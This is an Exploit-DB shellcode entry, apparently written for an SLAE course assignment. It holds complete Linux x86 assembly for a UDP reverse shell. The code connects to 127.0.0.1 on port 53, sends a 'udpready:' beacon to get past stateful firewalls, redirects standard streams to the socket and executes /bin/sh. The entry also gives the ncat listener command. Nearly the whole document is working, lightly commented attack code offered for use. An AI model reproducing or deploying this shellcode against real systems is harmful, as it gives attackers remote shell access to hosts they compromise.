Linux/x86 - Reverse (127.0.0.1:53/UDP) Shell (/bin/sh) Shellcode (668 bytes)

EDB-ID:

42208

CVE:

N/A

EDB Verified:

Author:

DONTON Fetenat C

Type:

shellcode

Exploit:   /  

Platform:

Linux_x86

Date:

2017-06-20

Vulnerable App: 
; SLAE-X 
; thanks to writesup from previou students :] 
; assignment: 2. create a reverse shell  
; originality: using UDP instead TCP 
; usage : sudo ncat -lup 53 on the receiving end 
; warning, this shellcode might contains null byte if you use certain ip / address 


%define htons(x) ((x >> 8) & 0xFF) | ((x & 0xFF) << 8)
%define _port 5353;   
PORT equ htons(_port); 

_ip equ 0x0100007F; loopback 127.0.0.1 test  
; warning use non null byte address here 
; 127.1.1.1 has issue on UDP fyi   

global _start 

_start: 

; we create a socket fd, using again syscall 0x66 and argument SYS_SOCKET so ebx = 1  
push   0x66
pop    eax
push   0x1 
pop    ebx
xor    ecx,ecx
push   ecx
; but this times it will be a SOCK_DGRAM UDP, so 0x2 as argument 
push   0x2  
push   0x2 
mov    ecx,esp
int    0x80
; saving fd 

; then we call connect on this UDP socket (to use send()) 
; int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
; we push ip address as argument 
push _ip; 
xor edx,edx
; port 53 without null byte 
mov dh, 0x35 ; comment this for variable port 
push dx; comment this for variable port 
; push word PORT ; UNcomment this for variable port 
push word 0x2; 

mov ecx,esp; save pointer to ecx 
push 0x10; addrlen 
push ecx; pointer to sockaddr 
push eax; fd received previously 
mov ecx,esp;  
mov esi,eax; save fd for next call 
xor    eax,eax 
mov    al,0x66  
add    bl,0x2   
int    0x80


; now we send a UDP packet to open stateful firewall :] 
xor eax,eax
mov al,0x66 
; ssize_t send(int sockfd, const void *buf, size_t len, int flags);
; we will send "udpready:" string to let the distant server know the shellcode is working and ready   
push 0x0a3a7964 
push 0x72706475  
mov edx,esp
; no flags needed 
xor ecx,ecx
push ecx
; size of message to be sent is 8 
push 0x8 
push edx 
push esi 
mov ecx,esp
xor ebx,ebx 
mov bl,0x9 
int 0x80 

; the rest is similar to assignment 1 > copy pasta

; duplicating fd from socket to stdin stdout stderr of the process 
mov    ebx,esi
; we need to clean ecx, at this stage it contains data "0xBFFFF39C"
; since we use "mov cl" and not mov ecx (to avoid null byte) we dont want to have this remaining data and break our loop 
xor ecx,ecx
mov    cl,0x2
; we use a loop and decrease cl register, ie from 2 to 0 , 2 - 1 - 0 
loop: 
; syscall dup2 
mov    al,0x3f
int    0x80
dec    ecx
; sign flag is not set if ecx is not inferior to 0 
; so we use "jump if not sign" which check if the flag is on   
jns    loop 

; syscall "execve", with arguments /bin//sh null terminated and a null string for envp argument  
mov    al,0xb
xor esi,esi
push   esi
push   0x68732f2f ; "//sh"
push   0x6e69622f ; "/bin"
mov    ebx,esp
; push null termination 
xor esi,esi
push   esi 
mov    edx,esp
push   ebx
mov    ecx,esp
int    0x80
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services